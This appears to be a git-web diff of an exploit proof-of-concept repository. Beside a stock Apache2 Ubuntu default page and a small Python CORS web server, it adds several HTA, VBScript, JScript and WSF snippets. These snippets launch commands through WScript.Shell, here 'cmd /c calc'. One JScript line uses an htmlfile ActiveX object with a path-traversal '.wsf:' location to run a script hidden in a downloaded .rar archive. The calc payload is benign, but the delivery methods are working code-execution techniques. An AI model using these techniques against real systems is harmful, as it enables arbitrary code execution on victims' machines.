|
||||||
|
font-family: Verdana, sans-serif; |
||||||
|
font-size: 11pt; |
||||||
|
text-align: center; |
||||||
|
} |
||||||
|
|
||||||
|
div.main_page { |
||||||
|
position: relative; |
||||||
|
display: table; |
||||||
|
|
||||||
|
width: 800px; |
||||||
|
|
||||||
|
margin-bottom: 3px; |
||||||
|
margin-left: auto; |
||||||
|
margin-right: auto; |
||||||
|
padding: 0px 0px 0px 0px; |
||||||
|
|
||||||
|
border-width: 2px; |
||||||
|
border-color: #212738; |
||||||
|
border-style: solid; |
||||||
|
|
||||||
|
background-color: #FFFFFF; |
||||||
|
|
||||||
|
text-align: center; |
||||||
|
} |
||||||
|
|
||||||
|
div.page_header { |
||||||
|
height: 99px; |
||||||
|
width: 100%; |
||||||
|
|
||||||
|
background-color: #F5F6F7; |
||||||
|
} |
||||||
|
|
||||||
|
div.page_header span { |
||||||
|
margin: 15px 0px 0px 50px; |
||||||
|
|
||||||
|
font-size: 180%; |
||||||
|
font-weight: bold; |
||||||
|
} |
||||||
|
|
||||||
|
div.page_header img { |
||||||
|
margin: 3px 0px 0px 40px; |
||||||
|
|
||||||
|
border: 0px 0px 0px; |
||||||
|
} |
||||||
|
|
||||||
|
div.table_of_contents { |
||||||
|
clear: left; |
||||||
|
|
||||||
|
min-width: 200px; |
||||||
|
|
||||||
|
margin: 3px 3px 3px 3px; |
||||||
|
|
||||||
|
background-color: #FFFFFF; |
||||||
|
|
||||||
|
text-align: left; |
||||||
|
} |
||||||
|
|
||||||
|
div.table_of_contents_item { |
||||||
|
clear: left; |
||||||
|
|
||||||
|
width: 100%; |
||||||
|
|
||||||
|
margin: 4px 0px 0px 0px; |
||||||
|
|
||||||
|
background-color: #FFFFFF; |
||||||
|
|
||||||
|
color: #000000; |
||||||
|
text-align: left; |
||||||
|
} |
||||||
|
|
||||||
|
div.table_of_contents_item a { |
||||||
|
margin: 6px 0px 0px 6px; |
||||||
|
} |
||||||
|
|
||||||
|
div.content_section { |
||||||
|
margin: 3px 3px 3px 3px; |
||||||
|
|
||||||
|
background-color: #FFFFFF; |
||||||
|
|
||||||
|
text-align: left; |
||||||
|
} |
||||||
|
|
||||||
|
div.content_section_text { |
||||||
|
padding: 4px 8px 4px 8px; |
||||||
|
|
||||||
|
color: #000000; |
||||||
|
font-size: 100%; |
||||||
|
} |
||||||
|
|
||||||
|
div.content_section_text pre { |
||||||
|
margin: 8px 0px 8px 0px; |
||||||
|
padding: 8px 8px 8px 8px; |
||||||
|
|
||||||
|
border-width: 1px; |
||||||
|
border-style: dotted; |
||||||
|
border-color: #000000; |
||||||
|
|
||||||
|
background-color: #F5F6F7; |
||||||
|
|
||||||
|
font-style: italic; |
||||||
|
} |
||||||
|
|
||||||
|
div.content_section_text p { |
||||||
|
margin-bottom: 6px; |
||||||
|
} |
||||||
|
|
||||||
|
div.content_section_text ul, div.content_section_text li { |
||||||
|
padding: 4px 8px 4px 16px; |
||||||
|
} |
||||||
|
|
||||||
|
div.section_header { |
||||||
|
padding: 3px 6px 3px 6px; |
||||||
|
|
||||||
|
background-color: #8E9CB2; |
||||||
|
|
||||||
|
color: #FFFFFF; |
||||||
|
font-weight: bold; |
||||||
|
font-size: 112%; |
||||||
|
text-align: center; |
||||||
|
} |
||||||
|
|
||||||
|
div.section_header_red { |
||||||
|
background-color: #CD214F; |
||||||
|
} |
||||||
|
|
||||||
|
div.section_header_grey { |
||||||
|
background-color: #9F9386; |
||||||
|
} |
||||||
|
|
||||||
|
.floating_element { |
||||||
|
position: relative; |
||||||
|
float: left; |
||||||
|
} |
||||||
|
|
||||||
|
div.table_of_contents_item a, |
||||||
|
div.content_section_text a { |
||||||
|
text-decoration: none; |
||||||
|
font-weight: bold; |
||||||
|
} |
||||||
|
|
||||||
|
div.table_of_contents_item a:link, |
||||||
|
div.table_of_contents_item a:visited, |
||||||
|
div.table_of_contents_item a:active { |
||||||
|
color: #000000; |
||||||
|
} |
||||||
|
|
||||||
|
div.table_of_contents_item a:hover { |
||||||
|
background-color: #000000; |
||||||
|
|
||||||
|
color: #FFFFFF; |
||||||
|
} |
||||||
|
|
||||||
|
div.content_section_text a:link, |
||||||
|
div.content_section_text a:visited, |
||||||
|
div.content_section_text a:active { |
||||||
|
background-color: #DCDFE6; |
||||||
|
|
||||||
|
color: #000000; |
||||||
|
} |
||||||
|
|
||||||
|
div.content_section_text a:hover { |
||||||
|
background-color: #000000; |
||||||
|
|
||||||
|
color: #DCDFE6; |
||||||
|
} |
||||||
|
|
||||||
|
div.validator { |
||||||
|
} |
||||||
|
</style> |
||||||
|
</head> |
||||||
|
<body> |
||||||
|
<div class="main_page"> |
||||||
|
<div class="page_header floating_element"> |
||||||
|
<img src="/icons/ubuntu-logo.png" alt="Ubuntu Logo" class="floating_element"/> |
||||||
|
<span class="floating_element"> |
||||||
|
Apache2 Ubuntu Default Page |
||||||
|
</span> |
||||||
|
</div> |
||||||
|
<!-- <div class="table_of_contents floating_element"> |
||||||
|
<div class="section_header section_header_grey"> |
||||||
|
TABLE OF CONTENTS |
||||||
|
</div> |
||||||
|
<div class="table_of_contents_item floating_element"> |
||||||
|
<a href="#about">About</a> |
||||||
|
</div> |
||||||
|
<div class="table_of_contents_item floating_element"> |
||||||
|
<a href="#changes">Changes</a> |
||||||
|
</div> |
||||||
|
<div class="table_of_contents_item floating_element"> |
||||||
|
<a href="#scope">Scope</a> |
||||||
|
</div> |
||||||
|
<div class="table_of_contents_item floating_element"> |
||||||
|
<a href="#files">Config files</a> |
||||||
|
</div> |
||||||
|
</div> |
||||||
|
--> |
||||||
|
<div class="content_section floating_element"> |
||||||
|
|
||||||
|
|
||||||
|
<div class="section_header section_header_red"> |
||||||
|
<div id="about"></div> |
||||||
|
It works! |
||||||
|
</div> |
||||||
|
<div class="content_section_text"> |
||||||
|
<p> |
||||||
|
This is the default welcome page used to test the correct |
||||||
|
operation of the Apache2 server after installation on Ubuntu systems. |
||||||
|
It is based on the equivalent page on Debian, from which the Ubuntu Apache |
||||||
|
packaging is derived. |
||||||
|
If you can read this page, it means that the Apache HTTP server installed at |
||||||
|
this site is working properly. You should <b>replace this file</b> (located at |
||||||
|
<tt>/var/www/html/index.html</tt>) before continuing to operate your HTTP server. |
||||||
|
</p> |
||||||
|
|
||||||
|
|
||||||
|
<p> |
||||||
|
If you are a normal user of this web site and don't know what this page is |
||||||
|
about, this probably means that the site is currently unavailable due to |
||||||
|
maintenance. |
||||||
|
If the problem persists, please contact the site's administrator. |
||||||
|
</p> |
||||||
|
|
||||||
|
</div> |
||||||
|
<div class="section_header"> |
||||||
|
<div id="changes"></div> |
||||||
|
Configuration Overview |
||||||
|
</div> |
||||||
|
<div class="content_section_text"> |
||||||
|
<p> |
||||||
|
Ubuntu's Apache2 default configuration is different from the |
||||||
|
upstream default configuration, and split into several files optimized for |
||||||
|
interaction with Ubuntu tools. The configuration system is |
||||||
|
<b>fully documented in |
||||||
|
/usr/share/doc/apache2/README.Debian.gz</b>. Refer to this for the full |
||||||
|
documentation. Documentation for the web server itself can be |
||||||
|
found by accessing the <a href="/manual">manual</a> if the <tt>apache2-doc</tt> |
||||||
|
package was installed on this server. |
||||||
|
|
||||||
|
</p> |
||||||
|
<p> |
||||||
|
The configuration layout for an Apache2 web server installation on Ubuntu systems is as follows: |
||||||
|
</p> |
||||||
|
<pre> |
||||||
|
/etc/apache2/ |
||||||
|
|-- apache2.conf |
||||||
|
| `-- ports.conf |
||||||
|
|-- mods-enabled |
||||||
|
| |-- *.load |
||||||
|
| `-- *.conf |
||||||
|
|-- conf-enabled |
||||||
|
| `-- *.conf |
||||||
|
|-- sites-enabled |
||||||
|
| `-- *.conf |
||||||
|
</pre> |
||||||
|
<ul> |
||||||
|
<li> |
||||||
|
<tt>apache2.conf</tt> is the main configuration |
||||||
|
file. It puts the pieces together by including all remaining configuration |
||||||
|
files when starting up the web server. |
||||||
|
</li> |
||||||
|
|
||||||
|
<li> |
||||||
|
<tt>ports.conf</tt> is always included from the |
||||||
|
main configuration file. It is used to determine the listening ports for |
||||||
|
incoming connections, and this file can be customized anytime. |
||||||
|
</li> |
||||||
|
|
||||||
|
<li> |
||||||
|
Configuration files in the <tt>mods-enabled/</tt>, |
||||||
|
<tt>conf-enabled/</tt> and <tt>sites-enabled/</tt> directories contain |
||||||
|
particular configuration snippets which manage modules, global configuration |
||||||
|
fragments, or virtual host configurations, respectively. |
||||||
|
</li> |
||||||
|
|
||||||
|
<li> |
||||||
|
They are activated by symlinking available |
||||||
|
configuration files from their respective |
||||||
|
*-available/ counterparts. These should be managed |
||||||
|
by using our helpers |
||||||
|
<tt> |
||||||
|
a2enmod, |
||||||
|
a2dismod, |
||||||
|
</tt> |
||||||
|
<tt> |
||||||
|
a2ensite, |
||||||
|
a2dissite, |
||||||
|
</tt> |
||||||
|
and |
||||||
|
<tt> |
||||||
|
a2enconf, |
||||||
|
a2disconf |
||||||
|
</tt>. See their respective man pages for detailed information. |
||||||
|
</li> |
||||||
|
|
||||||
|
<li> |
||||||
|
The binary is called apache2. Due to the use of |
||||||
|
environment variables, in the default configuration, apache2 needs to be |
||||||
|
started/stopped with <tt>/etc/init.d/apache2</tt> or <tt>apache2ctl</tt>. |
||||||
|
<b>Calling <tt>/usr/bin/apache2</tt> directly will not work</b> with the |
||||||
|
default configuration. |
||||||
|
</li> |
||||||
|
</ul> |
||||||
|
</div> |
||||||
|
|
||||||
|
<div class="section_header"> |
||||||
|
<div id="docroot"></div> |
||||||
|
Document Roots |
||||||
|
</div> |
||||||
|
|
||||||
|
<div class="content_section_text"> |
||||||
|
<p> |
||||||
|
By default, Ubuntu does not allow access through the web browser to |
||||||
|
<em>any</em> file apart of those located in <tt>/var/www</tt>, |
||||||
|
<a href="http://httpd.apache.org/docs/2.4/mod/mod_userdir.html" rel="nofollow">public_html</a> |
||||||
|
directories (when enabled) and <tt>/usr/share</tt> (for web |
||||||
|
applications). If your site is using a web document root |
||||||
|
located elsewhere (such as in <tt>/srv</tt>) you may need to whitelist your |
||||||
|
document root directory in <tt>/etc/apache2/apache2.conf</tt>. |
||||||
|
</p> |
||||||
|
<p> |
||||||
|
The default Ubuntu document root is <tt>/var/www/html</tt>. You |
||||||
|
can make your own virtual hosts under /var/www. This is different |
||||||
|
to previous releases which provides better security out of the box. |
||||||
|
</p> |
||||||
|
</div> |
||||||
|
|
||||||
|
<div class="section_header"> |
||||||
|
<div id="bugs"></div> |
||||||
|
Reporting Problems |
||||||
|
</div> |
||||||
|
<div class="content_section_text"> |
||||||
|
<p> |
||||||
|
Please use the <tt>ubuntu-bug</tt> tool to report bugs in the |
||||||
|
Apache2 package with Ubuntu. However, check <a |
||||||
|
href="https://bugs.launchpad.net/ubuntu/+source/apache2" |
||||||
|
rel="nofollow">existing bug reports</a> before reporting a new bug. |
||||||
|
</p> |
||||||
|
<p> |
||||||
|
Please report bugs specific to modules (such as PHP and others) |
||||||
|
to respective packages, not to the web server itself. |
||||||
|
</p> |
||||||
|
</div> |
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
</div> |
||||||
|
</div> |
||||||
|
<div class="validator"> |
||||||
|
</div> |
||||||
|
</body> |
||||||
|
</html> |
||||||
|
|
||||||
|
|
Binary file not shown.
@ -0,0 +1,11 @@ |
|||||||
|
<script language="VBScript"> |
||||||
|
Function Calc() |
||||||
|
Dim wsh |
||||||
|
Set wsh = CreateObject("Wscript.Shell") |
||||||
|
wsh.run "cmd /c calc.exe" |
||||||
|
Set wsh = Nothing |
||||||
|
End Function |
||||||
|
|
||||||
|
Calc |
||||||
|
self.close |
||||||
|
</script> |
@ -0,0 +1,6 @@ |
|||||||
|
function calc(){ |
||||||
|
var x = new ActiveXObject("WScript.shell"); |
||||||
|
x.Run("cmd /c calc"); |
||||||
|
} |
||||||
|
|
||||||
|
calc(); |
@ -0,0 +1,8 @@ |
|||||||
|
Function Calc() |
||||||
|
Dim wsh |
||||||
|
Set wsh = CreateObject("Wscript.Shell") |
||||||
|
wsh.run "cmd /c calc.exe" |
||||||
|
Set wsh = Nothing |
||||||
|
End Function |
||||||
|
|
||||||
|
Calc |
@ -0,0 +1 @@ |
|||||||
|
<job><script language="JScript">var x = new ActiveXObject("WScript.shell");x.Run("cmd /c calc");</script></job> |
@ -0,0 +1 @@ |
|||||||
|
<job id="VBScriptJob"><script language="VBScript">CreateObject("WScript.Shell").Run "cmd /c calc"</script></job> |
@ -0,0 +1,2 @@ |
|||||||
|
var o = new ActiveXObject('htmlfile').Script.location='.wsf:../../../../../Users/d3adc0de.PCOIPTEST/Downloads/YK2TLVILEHG2.rar?.wsf'; |
||||||
|
WScript.Echo(o); |
@ -0,0 +1,51 @@ |
|||||||
|
import argparse |
||||||
|
import sys |
||||||
|
from builtins import Exception |
||||||
|
from http.server import HTTPServer, SimpleHTTPRequestHandler |
||||||
|
|
||||||
|
from werkzeug.serving import ForkingMixIn |
||||||
|
|
||||||
|
|
||||||
|
class CORSRequestHandler(SimpleHTTPRequestHandler): |
||||||
|
def end_headers(self): |
||||||
|
self.send_header('Access-Control-Allow-Origin', '*') |
||||||
|
self.send_header('Access-Control-Allow-Methods', 'GET, POST, OPTIONS') |
||||||
|
self.send_header('Cache-Control', 'no-store, no-cache, must-revalidate') |
||||||
|
return super(CORSRequestHandler, self).end_headers() |
||||||
|
|
||||||
|
def do_OPTIONS(self): |
||||||
|
self.do_GET() |
||||||
|
|
||||||
|
|
||||||
|
class ForkingHTTPServer(ForkingMixIn, HTTPServer): |
||||||
|
def finish_request(self, request, client_address): |
||||||
|
try: |
||||||
|
request.settimeout(15) |
||||||
|
# "super" can not be used because BaseServer is not created from object |
||||||
|
HTTPServer.finish_request(self, request, client_address) |
||||||
|
except Exception as e: |
||||||
|
print(f"[-] {e}") |
||||||
|
|
||||||
|
|
||||||
|
class WebServer: |
||||||
|
def __init__(self, ip, port): |
||||||
|
self.ip = ip |
||||||
|
self.port = port |
||||||
|
|
||||||
|
def start(self): |
||||||
|
httpd = ForkingHTTPServer((f'{self.ip}', self.port), CORSRequestHandler) |
||||||
|
try: |
||||||
|
httpd.serve_forever() |
||||||
|
except KeyboardInterrupt: |
||||||
|
httpd.server_close() |
||||||
|
exit(1) |
||||||
|
|
||||||
|
|
||||||
|
if __name__ == '__main__': |
||||||
|
parser = argparse.ArgumentParser(description="Simple CORS Webserver") |
||||||
|
parser.add_argument("ip", help="Listen address", type=str) |
||||||
|
parser.add_argument("port", help="Listen port", type=int) |
||||||
|
args = parser.parse_args() |
||||||
|
|
||||||
|
server = WebServer(ip=args.ip, port=args.port) |
||||||
|
server.start() |
Loading…
Reference in new issue